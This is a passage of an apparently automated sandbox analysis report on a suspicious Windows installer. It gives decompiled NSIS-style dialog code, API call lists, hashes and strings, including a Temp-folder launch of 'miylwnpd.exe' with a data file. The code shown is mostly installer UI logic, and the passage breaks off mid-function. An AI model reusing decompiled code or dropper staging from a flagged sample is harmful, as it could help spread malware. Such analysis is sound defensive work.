            					__eflags = _t130 - 0x110;
            					 *0x7a1f70 = _t34;
            					if(_t130 == 0x110) {
            						 *0x7a8aa8 = _t127;
            						 *0x7a1f84 = GetDlgItem(_t127, 1);
            						_t91 = GetDlgItem(_t127, 2);
            						_push(0xffffffff);
            						_push(0x1c);
            						 *0x79ff50 = _t91;
            						E004045CA(_t127);
            						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a88); // executed
            						 *0x7a7a6c = E0040140B(4);
            						_t34 = 1;
            						__eflags = 1;
            						 *0x7a1f70 = 1;
            					}
            					_t124 =  *0x40a39c; // 0x0
            					_t136 = 0;
            					_t133 = (_t124 << 6) +  *0x7a8ac0;
            					__eflags = _t124;
            					if(_t124 < 0) {
            						L36:
            						E00404616(0x40b);
            						while(1) {
            							_t36 =  *0x7a1f70;
            							 *0x40a39c =  *0x40a39c + _t36;
            							_t133 = _t133 + (_t36 << 6);
            							_t38 =  *0x40a39c; // 0x0
            							__eflags = _t38 -  *0x7a8ac4;
            							if(_t38 ==  *0x7a8ac4) {
            								E0040140B(1);
            							}
            							__eflags =  *0x7a7a6c - _t136;
            							if( *0x7a7a6c != _t136) {
            								break;
            							}
            							__eflags =  *0x40a39c -  *0x7a8ac4; // 0x0
            							if(__eflags >= 0) {
            								break;
            							}
            							_t117 =  *(_t133 + 0x14);
            							E004066AB(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
            							_push( *((intOrPtr*)(_t133 + 0x20)));
            							_push(0xfffffc19);
            							E004045CA(_t127);
            							_push( *((intOrPtr*)(_t133 + 0x1c)));
            							_push(0xfffffc1b);
            							E004045CA(_t127);
            							_push( *((intOrPtr*)(_t133 + 0x28)));
            							_push(0xfffffc1a);
            							E004045CA(_t127);
            							_t48 = GetDlgItem(_t127, 3);
            							__eflags =  *0x7a8b2c - _t136;
            							_v28 = _t48;
            							if( *0x7a8b2c != _t136) {
            								_t117 = _t117 & 0x0000fefd | 0x00000004;
            								__eflags = _t117;
            							}
            							ShowWindow(_t48, _t117 & 0x00000008);
            							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
            							E004045EC(_t117 & 0x00000002);
            							_t118 = _t117 & 0x00000004;
            							EnableWindow( *0x79ff50, _t118);
            							__eflags = _t118 - _t136;
            							if(_t118 == _t136) {
            								_push(1);
            							} else {
            								_push(_t136);
            							}
            							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
            							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
            							__eflags =  *0x7a8b2c - _t136;
            							if( *0x7a8b2c == _t136) {
            								_push( *0x7a1f84);
            							} else {
            								SendMessageW(_t127, 0x401, 2, _t136);
            								_push( *0x79ff50);
            							}
            							E004045FF();
            							E0040666E(0x7a1f88, E004040AC());
            							E004066AB(0x7a1f88, _t127, _t133,  &(0x7a1f88[lstrlenW(0x7a1f88)]),  *((intOrPtr*)(_t133 + 0x18)));
            							SetWindowTextW(_t127, 0x7a1f88);
            							_push(_t136);
            							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
            							__eflags = _t67;
            							if(_t67 != 0) {
            								continue;
            							} else {
            								__eflags =  *_t133 - _t136;
            								if( *_t133 == _t136) {
            									continue;
            								}
            								__eflags =  *(_t133 + 4) - 5;
            								if( *(_t133 + 4) != 5) {
            									DestroyWindow( *0x7a7a78);
            									 *0x7a0f60 = _t133;
            									__eflags =  *_t133 - _t136;
            									if( *_t133 <= _t136) {
            										goto L60;
            									}
            									_t73 = CreateDialogParamW( *0x7a8aa0,  *_t133 +  *0x7a7a80 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
            									__eflags = _t73 - _t136;
            									 *0x7a7a78 = _t73;
            									if(_t73 == _t136) {
            										goto L60;
            									}
            									_push( *((intOrPtr*)(_t133 + 0x2c)));
            									_push(6);
            									E004045CA(_t73);
            									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
            									ScreenToClient(_t127, _t137 + 0x10);
            									SetWindowPos( *0x7a7a78, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
            									_push(_t136);
            									E00401389( *((intOrPtr*)(_t133 + 0xc)));
            									__eflags =  *0x7a7a6c - _t136;
            									if( *0x7a7a6c != _t136) {
            										goto L63;
            									}
            									ShowWindow( *0x7a7a78, 8);
            									E00404616(0x405);
            									goto L60;
            								}
            								__eflags =  *0x7a8b2c - _t136;
            								if( *0x7a8b2c != _t136) {
            									goto L63;
            								}
            								__eflags =  *0x7a8b20 - _t136;
            								if( *0x7a8b20 != _t136) {
            									continue;
            								}
            								goto L63;
            							}
            						}
            						DestroyWindow( *0x7a7a78); // executed
            						 *0x7a8aa8 = _t136;
            						EndDialog(_t127,  *0x7a0758); // executed
            						goto L60;
            					} else {
            						__eflags = _t34 - 1;
            						if(_t34 != 1) {
            							L35:
            							__eflags =  *_t133 - _t136;
            							if( *_t133 == _t136) {
            								goto L63;
            							}
            							goto L36;
            						}
            						_push(0);
            						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
            						__eflags = _t86;
            						if(_t86 == 0) {
            							goto L35;
            						}
            						SendMessageW( *0x7a7a78, 0x40f, 0, 1);
            						__eflags =  *0x7a7a6c;
            						return 0 |  *0x7a7a6c == 0x00000000;
            					}
            				} else {
            					_t127 = _a4;
            					_t136 = 0;
            					if(_t130 == 0x47) {
            						SetWindowPos( *0x7a1f68, _t127, 0, 0, 0, 0, 0x13);
            					}
            					_t122 = _a12;
            					if(_t130 != 5) {
            						L8:
            						if(_t130 != 0x40d) {
            							__eflags = _t130 - 0x11;
            							if(_t130 != 0x11) {
            								__eflags = _t130 - 0x111;
            								if(_t130 != 0x111) {
            									goto L28;
            								}
            								_t135 = _t122 & 0x0000ffff;
            								_t128 = GetDlgItem(_t127, _t135);
            								__eflags = _t128 - _t136;
            								if(_t128 == _t136) {
            									L15:
            									__eflags = _t135 - 1;
            									if(_t135 != 1) {
            										__eflags = _t135 - 3;
            										if(_t135 != 3) {
            											_t129 = 2;
            											__eflags = _t135 - _t129;
            											if(_t135 != _t129) {
            												L27:
            												SendMessageW( *0x7a7a78, 0x111, _t122, _a16);
            												goto L28;
            											}
            											__eflags =  *0x7a8b2c - _t136;
            											if( *0x7a8b2c == _t136) {
            												_t99 = E0040140B(3);
            												__eflags = _t99;
            												if(_t99 != 0) {
            													goto L28;
            												}
            												 *0x7a0758 = 1;
            												L23:
            												_push(0x78);
            												L24:
            												E004045A3();
            												goto L28;
            											}
            											E0040140B(_t129);
            											 *0x7a0758 = _t129;
            											goto L23;
            										}
            										__eflags =  *0x40a39c - _t136; // 0x0
            										if(__eflags <= 0) {
            											goto L27;
            										}
            										_push(0xffffffff);
            										goto L24;
            									}
            									_push(_t135);
            									goto L24;
            								}
            								SendMessageW(_t128, 0xf3, _t136, _t136);
            								_t103 = IsWindowEnabled(_t128);
            								__eflags = _t103;
            								if(_t103 == 0) {
            									L63:
            									return 0;
            								}
            								goto L15;
            							}
            							SetWindowLongW(_t127, _t136, _t136);
            							return 1;
            						}
            						DestroyWindow( *0x7a7a78);
            						 *0x7a7a78 = _t122;
            						L60:
            						if( *0x7a3f88 == _t136 &&  *0x7a7a78 != _t136) {
            							ShowWindow(_t127, 0xa);
            							 *0x7a3f88 = 1;
            						}
            						goto L63;
            					} else {
            						asm("sbb eax, eax");
            						ShowWindow( *0x7a1f68,  ~(_t122 - 1) & 0x00000005);
            						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
            							L28:
            							return E00404631(_a8, _t122, _a16);
            						} else {
            							ShowWindow(_t127, 4);
            							goto L8;
            						}
            					}
            				}
            			}































            0x004040d6
            0x004040dd
            0x00404244
            0x00404248
            0x0040424c
            0x0040424e
            0x00404253
            0x0040425e
            0x00404269
            0x0040426e
            0x00404270
            0x00404272
            0x00404275
            0x0040427a
            0x00404288
            0x00404295
            0x0040429c
            0x0040429c
            0x0040429d
            0x0040429d
            0x004042a2
            0x004042a8
            0x004042af
            0x004042b5
            0x004042b7
            0x004042f7
            0x004042fc
            0x00404301
            0x00404301
            0x00404306
            0x0040430f
            0x00404311
            0x00404316
            0x0040431c
            0x00404320
            0x00404320
            0x00404325
            0x0040432b
            0x00000000
            0x00000000
            0x00404336
            0x0040433c
            0x00000000
            0x00000000
            0x00404345
            0x0040434d
            0x00404352
            0x00404355
            0x0040435b
            0x00404360
            0x00404363
            0x00404369
            0x0040436e
            0x00404371
            0x00404377
            0x0040437f
            0x00404385
            0x0040438b
            0x0040438f
            0x00404396
            0x00404396
            0x00404396
            0x004043a0
            0x004043b2
            0x004043be
            0x004043c3
            0x004043cd
            0x004043d3
            0x004043d5
            0x004043da
            0x004043d7
            0x004043d7
            0x004043d7
            0x004043ea
            0x00404402
            0x00404404
            0x0040440a
            0x0040441f
            0x0040440c
            0x00404415
            0x00404417
            0x00404417
            0x00404425
            0x00404436
            0x0040444c
            0x00404453
            0x00404459
            0x0040445d
            0x00404462
            0x00404464
            0x00000000
            0x0040446a
            0x0040446a
            0x0040446c
            0x00000000
            0x00000000
            0x00404472
            0x00404476
            0x0040449b
            0x004044a1
            0x004044a7
            0x004044a9
            0x00000000
            0x00000000
            0x004044cf
            0x004044d5
            0x004044d7
            0x004044dc
            0x00000000
            0x00000000
            0x004044e2
            0x004044e5
            0x004044e8
            0x004044ff
            0x0040450b
            0x00404524
            0x0040452a
            0x0040452e
            0x00404533
            0x00404539
            0x00000000
            0x00000000
            0x00404543
            0x0040454e
            0x00000000
            0x0040454e
            0x00404478
            0x0040447e
            0x00000000
            0x00000000
            0x00404484
            0x0040448a
            0x00000000
            0x00000000
            0x00000000
            0x00404490
            0x00404464
            0x0040455b
            0x00404567
            0x0040456e
            0x00000000
            0x004042b9
            0x004042b9
            0x004042bc
            0x004042ef
            0x004042ef
            0x004042f1
            0x00000000
            0x00000000
            0x00000000
            0x004042f1
            0x004042be
            0x004042c2
            0x004042c7
            0x004042c9
            0x00000000
            0x00000000
            0x004042d9
            0x004042e1
            0x00000000
            0x004042e7
            0x004040ef
            0x004040ef
            0x004040f3
            0x004040f8
            0x00404107
            0x00404107
            0x0040410d
            0x00404114
            0x00404158
            0x0040415e
            0x00404177
            0x0040417a
            0x0040418d
            0x00404193
            0x00000000
            0x00000000
            0x00404199
            0x004041a4
            0x004041a6
            0x004041a8
            0x004041c7
            0x004041c7
            0x004041ca
            0x004041cf
            0x004041d2
            0x004041e2
            0x004041e3
            0x004041e5
            0x0040421b
            0x0040422b
            0x00000000
            0x0040422b
            0x004041e7
            0x004041ed
            0x00404206
            0x0040420b
            0x0040420d
            0x00000000
            0x00000000
            0x0040420f
            0x004041fb
            0x004041fb
            0x004041fd
            0x004041fd
            0x00000000
            0x004041fd
            0x004041f0
            0x004041f5
            0x00000000
            0x004041f5
            0x004041d4
            0x004041da
            0x00000000
            0x00000000
            0x004041dc
            0x00000000
            0x004041dc
            0x004041cc
            0x00000000
            0x004041cc
            0x004041b2
            0x004041b9
            0x004041bf
            0x004041c1
            0x00404597
            0x00000000
            0x00404597
            0x00000000
            0x004041c1
            0x0040417f
            0x00000000
            0x00404187
            0x00404166
            0x0040416c
            0x00404574
            0x0040457a
            0x00404587
            0x0040458d
            0x0040458d
            0x00000000
            0x00404116
            0x0040411b
            0x00404127
            0x00404130
            0x00404231
            0x00000000
            0x0040414f
            0x00404152
            0x00000000
            0x00404152
            0x00404130
            0x00404114

            APIs
            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404107
            • ShowWindow.USER32(?), ref: 00404127
            • GetWindowLongW.USER32(?,000000F0), ref: 00404139
            • ShowWindow.USER32(?,00000004), ref: 00404152
            • DestroyWindow.USER32 ref: 00404166
            • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040417F
            • GetDlgItem.USER32 ref: 0040419E
            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041B2
            • IsWindowEnabled.USER32(00000000), ref: 004041B9
            • GetDlgItem.USER32 ref: 00404264
            • GetDlgItem.USER32 ref: 0040426E
            • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404288
            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D9
            • GetDlgItem.USER32 ref: 0040437F
            • ShowWindow.USER32(00000000,?), ref: 004043A0
            • EnableWindow.USER32(?,?), ref: 004043B2
            • EnableWindow.USER32(?,?), ref: 004043CD
            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043E3
            • EnableMenuItem.USER32 ref: 004043EA
            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404402
            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404415
            • lstrlenW.KERNEL32(007A1F88,?,007A1F88,00000000), ref: 0040443F
            • SetWindowTextW.USER32(?,007A1F88), ref: 00404453
            • ShowWindow.USER32(?,0000000A), ref: 00404587
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
            • String ID:
            • API String ID: 2475350683-0
            • Opcode ID: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
            • Instruction ID: f65a6081c11fa3fb00f54a078e57315272211b1d7c342d1bec1514082707246b
            • Opcode Fuzzy Hash: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
            • Instruction Fuzzy Hash: 63C1ADB1500204BFDB216F65EE49E2A3AA8EBC6745F00853EF741B55E0CB3D5851DB2E
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 248 403d1d-403d35 call 406a3b 251 403d37-403d42 GetUserDefaultUILanguage call 4065b5 248->251 252 403d49-403d80 call 40653c 248->252 255 403d47 251->255 258 403d82-403d93 call 40653c 252->258 259 403d98-403d9e lstrcatW 252->259 257 403da3-403dcc call 403ff3 call 406045 255->257 265 403dd2-403dd7 257->265 266 403e5e-403e66 call 406045 257->266 258->259 259->257 265->266 267 403ddd-403e05 call 40653c 265->267 272 403e74-403e99 LoadImageW 266->272 273 403e68-403e6f call 4066ab 266->273 267->266 274 403e07-403e0b 267->274 276 403f1a-403f22 call 40140b 272->276 277 403e9b-403ecb RegisterClassW 272->277 273->272 278 403e1d-403e29 lstrlenW 274->278 279 403e0d-403e1a call 405f6a 274->279 290 403f24-403f27 276->290 291 403f2c-403f37 call 403ff3 276->291 280 403ed1-403f15 SystemParametersInfoW CreateWindowExW 277->280 281 403fe9 277->281 285 403e51-403e59 call 405f3d call 40666e 278->285 286 403e2b-403e39 lstrcmpiW 278->286 279->278 280->276 284 403feb-403ff2 281->284 285->266 286->285 289 403e3b-403e45 GetFileAttributesW 286->289 294 403e47-403e49 289->294 295 403e4b-403e4c call 405f89 289->295 290->284 300 403fc0-403fc8 call 4057a3 291->300 301 403f3d-403f57 ShowWindow call 4069cb 291->301 294->285 294->295 295->285 306 403fe2-403fe4 call 40140b 300->306 307 403fca-403fd0 300->307 308 403f63-403f75 GetClassInfoW 301->308 309 403f59-403f5e call 4069cb 301->309 306->281 307->290 310 403fd6-403fdd call 40140b 307->310 313 403f77-403f87 GetClassInfoW RegisterClassW 308->313 314 403f8d-403fb0 DialogBoxParamW call 40140b 308->314 309->308 310->290 313->314 318 403fb5-403fbe call 403c6d 314->318 318->284
            C-Code - Quality: 96%
            			E00403D1D(void* __eflags) {
            				intOrPtr _v4;
            				intOrPtr _v8;
            				int _v12;
            				void _v16;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				intOrPtr* _t22;
            				void* _t30;
            				void* _t32;
            				int _t33;
            				void* _t36;
            				int _t39;
            				int _t40;
            				int _t44;
            				short _t63;
            				WCHAR* _t65;
            				signed char _t69;
            				signed short _t73;
            				WCHAR* _t76;
            				intOrPtr _t82;
            				WCHAR* _t87;
            
            				_t82 =  *0x7a8ab0;
            				_t22 = E00406A3B(2);
            				_t90 = _t22;
            				if(_t22 == 0) {
            					_t76 = 0x7a1f88;
            					L"1033" = 0x30;
            					 *0x7b5002 = 0x78;
            					 *0x7b5004 = 0;
            					E0040653C(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f88, 0);
            					__eflags =  *0x7a1f88;
            					if(__eflags == 0) {
            						E0040653C(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f88, 0);
            					}
            					lstrcatW(L"1033", _t76);
            				} else {
            					_t73 =  *_t22(); // executed
            					E004065B5(L"1033", _t73 & 0x0000ffff);
            				}
            				E00403FF3(_t78, _t90);
            				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
            				 *0x7a8b20 =  *0x7a8ab8 & 0x00000020;
            				 *0x7a8b3c = 0x10000;
            				if(E00406045(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
            					L16:
            					if(E00406045(_t98, _t86) == 0) {
            						E004066AB(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
            					}
            					_t30 = LoadImageW( *0x7a8aa0, 0x67, 1, 0, 0, 0x8040); // executed
            					 *0x7a7a88 = _t30;
            					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
            						L21:
            						if(E0040140B(0) == 0) {
            							_t32 = E00403FF3(_t78, __eflags);
            							__eflags =  *0x7a8b40;
            							if( *0x7a8b40 != 0) {
            								_t33 = E004057A3(_t32, 0);
            								__eflags = _t33;
            								if(_t33 == 0) {
            									E0040140B(1);
            									goto L33;
            								}
            								__eflags =  *0x7a7a6c;
            								if( *0x7a7a6c == 0) {
            									E0040140B(2);
            								}
            								goto L22;
            							}
            							ShowWindow( *0x7a1f68, 5); // executed
            							_t39 = E004069CB("RichEd20"); // executed
            							__eflags = _t39;
            							if(_t39 == 0) {
            								E004069CB("RichEd32");
            							}
            							_t87 = L"RichEdit20W";
            							_t40 = GetClassInfoW(0, _t87, 0x7a7a40);
            							__eflags = _t40;
            							if(_t40 == 0) {
            								GetClassInfoW(0, L"RichEdit", 0x7a7a40);
            								 *0x7a7a64 = _t87;
            								RegisterClassW(0x7a7a40);
            							}
            							_t44 = DialogBoxParamW( *0x7a8aa0,  *0x7a7a80 + 0x00000069 & 0x0000ffff, 0, E004040CB, 0); // executed
            							E00403C6D(E0040140B(5), 1);
            							return _t44;
            						}
            						L22:
            						_t36 = 2;
            						return _t36;
            					} else {
            						_t78 =  *0x7a8aa0;
            						 *0x7a7a44 = E00401000;
            						 *0x7a7a50 =  *0x7a8aa0;
            						 *0x7a7a54 = _t30;
            						 *0x7a7a64 = 0x40a3b4;
            						if(RegisterClassW(0x7a7a40) == 0) {
            							L33:
            							__eflags = 0;
            							return 0;
            						}
            						SystemParametersInfoW(0x30, 0,  &_v16, 0);
            						 *0x7a1f68 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8aa0, 0);
            						goto L21;
            					}
            				} else {
            					_t78 =  *(_t82 + 0x48);
            					_t92 = _t78;
            					if(_t78 == 0) {
            						goto L16;
            					}
            					_t76 = 0x7a6a40;
            					E0040653C(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8ad8 + _t78 * 2,  *0x7a8ad8 +  *(_t82 + 0x4c) * 2, 0x7a6a40, 0);
            					_t63 =  *0x7a6a40; // 0x43
            					if(_t63 == 0) {
            						goto L16;
            					}
            					if(_t63 == 0x22) {
            						_t76 = 0x7a6a42;
            						 *((short*)(E00405F6A(0x7a6a42, 0x22))) = 0;
            					}
            					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
            					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
            						L15:
            						E0040666E(_t86, E00405F3D(_t76));
            						goto L16;
            					} else {
            						_t69 = GetFileAttributesW(_t76);
            						if(_t69 == 0xffffffff) {
            							L14:
            							E00405F89(_t76);
            							goto L15;
            						}
            						_t98 = _t69 & 0x00000010;
            						if((_t69 & 0x00000010) != 0) {
            							goto L15;
            						}
            						goto L14;
            					}
            				}
            			}

























            0x00403d23
            0x00403d2c
            0x00403d33
            0x00403d35
            0x00403d49
            0x00403d5b
            0x00403d64
            0x00403d6d
            0x00403d74
            0x00403d79
            0x00403d80
            0x00403d93
            0x00403d93
            0x00403d9e
            0x00403d37
            0x00403d37
            0x00403d42
            0x00403d42
            0x00403da3
            0x00403dad
            0x00403db6
            0x00403dbb
            0x00403dcc
            0x00403e5e
            0x00403e66
            0x00403e6f
            0x00403e6f
            0x00403e85
            0x00403e8b
            0x00403e99
            0x00403f1a
            0x00403f22
            0x00403f2c
            0x00403f31
            0x00403f37
            0x00403fc1
            0x00403fc6
            0x00403fc8
            0x00403fe4
            0x00000000
            0x00403fe4
            0x00403fca
            0x00403fd0
            0x00403fd8
            0x00403fd8
            0x00000000
            0x00403fd0
            0x00403f45
            0x00403f50
            0x00403f55
            0x00403f57
            0x00403f5e
            0x00403f5e
            0x00403f69
            0x00403f71
            0x00403f73
            0x00403f75
            0x00403f7e
            0x00403f81
            0x00403f87
            0x00403f87
            0x00403fa6
            0x00403fb7
            0x00000000
            0x00403fbc
            0x00403f24
            0x00403f26
            0x00000000
            0x00403e9b
            0x00403e9b
            0x00403ea7
            0x00403eb1
            0x00403eb7
            0x00403ebc
            0x00403ecb
            0x00403fe9
            0x00403fe9
            0x00000000
            0x00403fe9
            0x00403eda
            0x00403f15
            0x00000000
            0x00403f15
            0x00403dd2
            0x00403dd2
            0x00403dd5
            0x00403dd7
            0x00000000
            0x00000000
            0x00403de5
            0x00403df7
            0x00403dfc
            0x00403e05
            0x00000000
            0x00000000
            0x00403e0b
            0x00403e0d
            0x00403e1a
            0x00403e1a
            0x00403e23
            0x00403e29
            0x00403e51
            0x00403e59
            0x00000000
            0x00403e3b
            0x00403e3c
            0x00403e45
            0x00403e4b
            0x00403e4c
            0x00000000
            0x00403e4c
            0x00403e47
            0x00403e49
            0x00000000
            0x00000000
            0x00000000
            0x00403e49
            0x00403e29

            APIs
              • Part of subcall function 00406A3B: GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
              • Part of subcall function 00406A3B: GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
            • GetUserDefaultUILanguage.KERNELBASE(00000002,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403D37
              • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
            • lstrcatW.KERNEL32(1033,007A1F88), ref: 00403D9E
            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,?,?,?,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000,00000002,76CDFAA0), ref: 00403E1E
            • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,?,?,?,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000), ref: 00403E31
            • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,?,00000000,?), ref: 00403E3C
            • LoadImageW.USER32 ref: 00403E85
            • RegisterClassW.USER32 ref: 00403EC2
            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403EDA
            • CreateWindowExW.USER32 ref: 00403F0F
            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F45
            • GetClassInfoW.USER32 ref: 00403F71
            • GetClassInfoW.USER32 ref: 00403F7E
            • RegisterClassW.USER32 ref: 00403F87
            • DialogBoxParamW.USER32 ref: 00403FA6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
            • String ID: .DEFAULT\Control Panel\International$.exe$1033$@zz$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
            • API String ID: 606308-3242864759
            • Opcode ID: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
            • Instruction ID: b3798c48b8e7ed104fde3a001c8dc5b3ad58c50dca8dc7adab70101e5acdd628
            • Opcode Fuzzy Hash: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
            • Instruction Fuzzy Hash: 6561C170640200BED620AF669D46F2B3A6CEBC5B45F40853FF941B62E2DB7D8901CB6D
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 321 4030d0-40311e GetTickCount GetModuleFileNameW call 40615e 324 403120-403125 321->324 325 40312a-403158 call 40666e call 405f89 call 40666e GetFileSize 321->325 326 403370-403374 324->326 333 403246-403254 call 40302e 325->333 334 40315e-403175 325->334 340 403328-40332d 333->340 341 40325a-40325d 333->341 336 403177 334->336 337 403179-403186 call 4035e8 334->337 336->337 345 4032e4-4032ec call 40302e 337->345 346 40318c-403192 337->346 340->326 343 403289-4032d8 GlobalAlloc call 40618d CreateFileW 341->343 344 40325f-403277 call 4035fe call 4035e8 341->344 362 4032da-4032df 343->362 363 4032ee-40331e call 4035fe call 403377 343->363 344->340 373 40327d-403283 344->373 345->340 350 403212-403216 346->350 351 403194-4031ac call 406119 346->351 354 403218-40321e call 40302e 350->354 355 40321f-403225 350->355 351->355 365 4031ae-4031b5 351->365 354->355 360 403227-403235 call 406b28 355->360 361 403238-403240 355->361 360->361 361->333 361->334 362->326 377 403323-403326 363->377 365->355 371 4031b7-4031be 365->371 371->355 374 4031c0-4031c7 371->374 373->340 373->343 374->355 376 4031c9-4031d0 374->376 376->355 378 4031d2-4031f2 376->378 377->340 379 40332f-403340 377->379 378->340 380 4031f8-4031fc 378->380 381 403342 379->381 382 403348-40334d 379->382 383 403204-40320c 380->383 384 4031fe-403202 380->384 381->382 385 40334e-403354 382->385 383->355 386 40320e-403210 383->386 384->333 384->383 385->385 387 403356-40336e call 406119 385->387 386->355 387->326
            C-Code - Quality: 97%
            			E004030D0(void* __eflags, signed int _a4) {
            				long _v8;
            				long _v12;
            				intOrPtr _v16;
            				long _v20;
            				intOrPtr _v24;
